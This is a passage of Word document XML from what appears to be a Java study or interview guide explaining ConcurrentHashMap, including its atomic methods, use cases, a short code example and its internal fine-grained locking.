        <w:t>: Write operations (e.g., put(), remove()) may lock a specific segment, but the locking is fine-grained, allowing other threads to perform operations on other segments concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248465C7" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Null Keys or Values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064156FE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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currentHashMap does not allow null keys or values. If you try to insert a null key or value, it will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2FDA2" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tomic Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8DB89" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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provides several atomic methods like putIfAbsent(), replace(), and remove(), which can be used to update the map in a thread-safe manner without the need for explicit synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CAECA3" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE50933" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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currentHashMap is designed for high-concurrency environments. It scales well in scenarios where many threads need to access and modify the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EB727" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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mon Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E533E6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ulti-threaded Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104EB81" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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currentHashMap is commonly used in multi-threaded applications where you need to ensure thread safety without sacrificing performance. For example, it is used in scenarios like caches, counters, and statistics tracking in web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB6B89" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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igh Concurrency Scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE93F08" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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you have a situation where you have multiple threads doing concurrent get() and put() operations, a ConcurrentHashMap is ideal since it handles high concurrency without the need for manual synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124208F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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oducer-Consumer Problems</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201FFEA" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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s useful when implementing producer-consumer problems where multiple threads need to read and write data concurrently while maintaining thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C39869" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BADD45" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C773D6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB3B56D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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ConcurrentHashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45440AE3" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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5E627CB5" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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ncurrentHashMap&lt;String, Integer&gt; map = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03570838" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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CE3055D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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dding key-value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51A363" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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A", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F60EAB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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B", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D79C9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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map.put("C", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855C852" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF2C362" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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pdating a value if absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E7F62" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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IfAbsent("A", 10);  // This will not change the value since "A" is already present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9CB50" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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1E98770" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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tomic update: adding only if the key is not present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDC98D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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IfAbsent("D", 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129F56B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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1B909D9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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Removing a key-value pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBACF6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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remove("B");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E73F32" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4670353C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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Displaying the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B710FE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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map); // Output: {A=1, C=3, D=4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13C414" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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4560B02" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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3F11A1A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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Methods in ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13833123" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tIfAbsent(K key, V value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inserts a key-value pair only if the key is not already present in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00CF74" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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move(Object key, Object value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes the entry for the specified key only if it is currently mapped to the specified value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59235068" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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place(K key, V oldValue, V newValue)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces the entry only if the key is currently mapped to the specified old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0999F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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uteIfAbsent(K key, Function&lt;? super K, ? extends V&gt; mappingFunction)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Computes the value for the specified key if the key is not already associated with a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA23B8E" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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dvantages of Using ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3ABC6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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cy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides high concurrency compared to Hashtable and Collections.synchronizedMap(), as it allows multiple threads to access the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71A810" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Locking for Reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Read operations (e.g., get()) are lock-free, making it faster for concurrent read-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49658D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tter Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Its segmented locking mechanism allows it to scale better for high-concurrency applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC98FE4" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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to Use ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A1E41D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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need a map that can be accessed by multiple threads concurrently without the risk of data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8EE8C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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want to avoid the overhead of locking the entire map, which is common in other thread-safe collections like Hashtable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A44BAD" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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high-concurrency scenarios where multiple threads perform read and write operations on the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7E504" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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summary, ConcurrentHashMap provides thread-safe operations while allowing high concurrency and better performance compared to other thread-safe collections, making it a go-to choice for multi-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE52AB" w14:textId="0C3A881F"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A117ECD">
          <v:rect id="_x0000_i1548" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE509D1" w14:textId="77777777" w:rsidR="003F7C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="003F7C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc196307660"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ConcurrentHashMap works?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="0C0EDD0C" w14:textId="634BD33A" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ow ConcurrentHashMap Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142DC8B"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oncurrentHashMap is a thread-safe version of HashMap that provides better concurrency by allowing multiple threads to read and write concurrently, without causing data corruption or inconsistency. It achieves this by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</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segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of locking the entire map, which allows greater scalability compared to other synchronized collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D138966"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s a detailed breakdown of how ConcurrentHashMap works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218B0425" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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Segmentation (Buckets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2ABD1B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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gmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In earlier versions of ConcurrentHashMap, the map was divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each segment is essentially a smaller part of the map (like a bucket) that can be locked independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5A175" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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gments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These segments allow multiple threads to concurrently operate on different parts of the map. Each segment is a separate HashMap, and thread contention is minimized because different threads can work on different segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2FC7AB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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urrent version (Java 8 and above)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The segmentation concept has evolved into a more fine-grained mechanism using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with lock-free reads and optimized lock management for writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100BAD83" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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Fine-Grained Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C2B85" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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Instead of locking the entire map (as Hashtable does), ConcurrentHashMap uses fine-grained locks for different parts of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE5840" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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ucket Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each bucket in the map can be locked independently, meaning multiple threads can work on different buckets at the same time without blocking each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC34F1" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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cking on Writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (like put() or remove()) on the same bucket are synchronized, but this does not block access to other buckets. The synchronization is only local to the affected bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547C30B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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ad Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
